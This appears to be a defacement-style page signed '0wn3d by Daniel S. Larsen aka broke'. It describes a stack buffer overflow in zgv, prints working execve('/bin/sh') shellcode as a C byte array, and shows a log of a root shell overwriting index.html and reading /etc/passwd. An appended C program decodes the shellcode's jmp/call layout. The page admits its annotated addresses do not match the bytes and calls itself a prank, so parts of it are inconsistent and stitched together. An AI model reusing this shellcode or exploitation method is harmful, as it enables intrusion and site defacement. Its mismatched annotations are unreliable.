#DEFACE# 0wn3d by Daniel S. Larsen aka broke (for testing purposes)

minimal shellcode proof of concept:

At this point zgv does no bounds checking and writes past the end of smallbuffer. The saved return address (the one that would take function() back to main) is overwritten with an address that points into the stack buffer itself. When function() executes leave/ret, EIP lands on the stack, in the NOP sled in front of the shellcode:

    0xbffff574  nop
    0xbffff575  nop
    0xbffff576  nop
    0xbffff577  jmp  $0x24              1
    0xbffff579  popl %esi               3 <--\
                [... shellcode starts here ...] |
    0xbffff59b  call -$0x1c             2 <--/
    0xbffff59e  .string "/bin/shX"

The numbered arrows are the usual jmp/call trick: (1) the jmp skips forward to the call, (2) the call pushes the address of the byte that follows it, which is the "/bin/shX" string, and jumps back, (3) popl %esi pops that address so the code can patch the 'X' to a NUL and build argv without knowing where it sits in memory. One caveat: the bytes of the 38-byte shellcode below start with \xeb\x17, a 2-byte jmp with displacement +0x17, and the call displacement is -0x1c, so the call sits at offset 25 and the string at offset 30 of the shellcode. The addresses written in the sketch ($0x24, 0xbffff59b, 0xbffff59e) do not line up with those bytes and should not be taken literally.

Let's test the exploit...

    # cc -o brokeRootCrapThisIsAllBullshit zgx.c
    # ./brokeRootCrapThisIsAllBullshit
    using address 0xbffff574
    bash# echo "0wn3d by Daniel ...." > index.html
    bash# cat /etc/passwd

The shellcode used by zgx.c:

    /* This is the minimal shellcode from the tutorial */
    static char shellcode[]=
        "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d"
        "\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58";

This is just a gibberish prank. Just drop the index.html.
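As an added worked example (not part of the page, and not the author's zgx.c), the C below takes the 38-byte shellcode exactly as listed above and resolves the jmp/call pair from the bytes themselves: where the leading jmp lands, where the call returns to, and which bytes the call's pushed "return address" points at. It then replays the three stores the shellcode does after popl %esi on a copy of the "/bin/shX" block, which shows why the 'X' is there (a placeholder for the NUL the code cannot carry as a raw 0x00 byte) and how argv[0]/argv[1] get built in place. The base address 0xbffff574 and the 3-byte NOP sled are taken from the sketch above; the function and struct names are my own, and nothing here runs the shellcode.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* The 38-byte execve("/bin/sh") shellcode exactly as the page lists it. */
static const unsigned char shellcode[] =
    "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d"
    "\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58";
#define SHELLCODE_LEN (sizeof(shellcode) - 1)

struct layout {
    size_t call_off;   /* offset of the call rel32 (0xe8) the leading jmp lands on */
    size_t pop_off;    /* offset the call returns to: must be popl %esi (0x5e)     */
    size_t string_off; /* first byte after the call: the address the call pushes  */
    int ok;            /* 1 when jmp -> call -> pop -> "/bin/sh" are all wired up  */
};

/* Resolve the jmp/call pair purely from the bytes, so a hand-drawn diagram
 * can be checked against what the CPU would actually do. */
static struct layout decode_layout(const unsigned char *sc, size_t len)
{
    struct layout l = {0, 0, 0, 0};
    /* 0xeb rel8: displacement is relative to the end of the 2-byte instruction */
    if (len < 2 || sc[0] != 0xeb) return l;
    long jmp_target = 2 + (int8_t)sc[1];
    if (jmp_target < 0 || (size_t)jmp_target + 5 > len || sc[jmp_target] != 0xe8) return l;
    l.call_off = (size_t)jmp_target;
    l.string_off = l.call_off + 5;
    /* 0xe8 rel32, little-endian, relative to the end of the 5-byte instruction */
    int32_t rel32 = (int32_t)((uint32_t)sc[l.call_off + 1]
                            | (uint32_t)sc[l.call_off + 2] << 8
                            | (uint32_t)sc[l.call_off + 3] << 16
                            | (uint32_t)sc[l.call_off + 4] << 24);
    long pop = (long)l.string_off + rel32;
    if (pop < 0 || (size_t)pop >= len || sc[pop] != 0x5e) return l;
    l.pop_off = (size_t)pop;
    /* the pushed address must point at the path the shellcode is going to exec */
    l.ok = (l.string_off + 8 <= len && memcmp(sc + l.string_off, "/bin/sh", 7) == 0);
    return l;
}

/* Absolute address of a shellcode offset once the buffer sits at `base` with
 * `sled` NOP bytes in front of it (the sketch uses 0xbffff574 and 3 NOPs). */
static uint32_t addr_of(uint32_t base, size_t sled, size_t off)
{
    return base + (uint32_t)(sled + off);
}

/* Replay the data setup the shellcode performs after popl %esi on a copy of
 * the "/bin/shX" block, laid out the way the shellcode expects it:
 *   %esi+0..7  "/bin/shX"   mov %al,0x7(%esi)  -> the 'X' becomes the NUL terminator
 *   %esi+8     argv[0]      mov %esi,0x8(%esi) -> points back at the path
 *   %esi+12    argv[1]      mov %eax,0xc(%esi) -> NULL (%eax was zeroed by xor)
 * `esi` is the address the string would have at run time; `block` needs 16 bytes.
 * Returns the path execve would receive, as a C string. */
static const char *simulate_string_setup(const unsigned char *sc, size_t string_off,
                                         uint32_t esi, unsigned char *block)
{
    uint32_t argv0 = esi, argv1 = 0;
    memcpy(block, sc + string_off, 8);
    block[7] = 0;                /* mov %al,0x7(%esi) with %eax == 0 */
    memcpy(block + 8, &argv0, 4);  /* mov %esi,0x8(%esi) */
    memcpy(block + 12, &argv1, 4); /* mov %eax,0xc(%esi) */
    return (const char *)block;
}

int main(void)
{
    struct layout l = decode_layout(shellcode, SHELLCODE_LEN);
    unsigned char blk[16];
    printf("jmp -> call at +%zu, call -> popl at +%zu, string at +%zu, ok=%d\n",
           l.call_off, l.pop_off, l.string_off, l.ok);
    printf("with base 0xbffff574 and 3 NOPs: call at 0x%08x, string at 0x%08x\n",
           addr_of(0xbffff574u, 3, l.call_off), addr_of(0xbffff574u, 3, l.string_off));
    printf("execve path after setup: %s\n",
           simulate_string_setup(shellcode, l.string_off, addr_of(0xbffff574u, 3, l.string_off), blk));
    return l.ok ? 0 : 1;
}
```

Run it and compare the two printed addresses with the sketch: with the bytes on this page the call sits at 0xbffff590 and the string at 0xbffff595, which is the check to do before trusting any hand-annotated address. If `ok` comes back 0 after editing the shellcode (say, to drop the argv setup), one of the displacements no longer points where the trick needs it to.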